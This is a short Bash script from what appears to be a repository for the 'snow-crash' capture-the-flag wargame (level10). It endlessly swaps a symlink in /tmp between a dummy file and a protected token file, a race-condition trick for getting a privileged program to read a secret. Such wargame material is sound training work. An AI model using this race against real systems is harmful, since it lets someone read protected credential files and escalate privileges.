snow-crash/level10/Ressources/loop_link.sh

10 lines
130 B
Bash
Raw Normal View History

2021-01-27 23:31:31 +00:00
while [ 1 ]
rm -rf /tmp/toto
touch /tmp/toto
do
ln -s -f /tmp/toto /tmp/link
ln -s -f /home/user/level10/token /tmp/link
done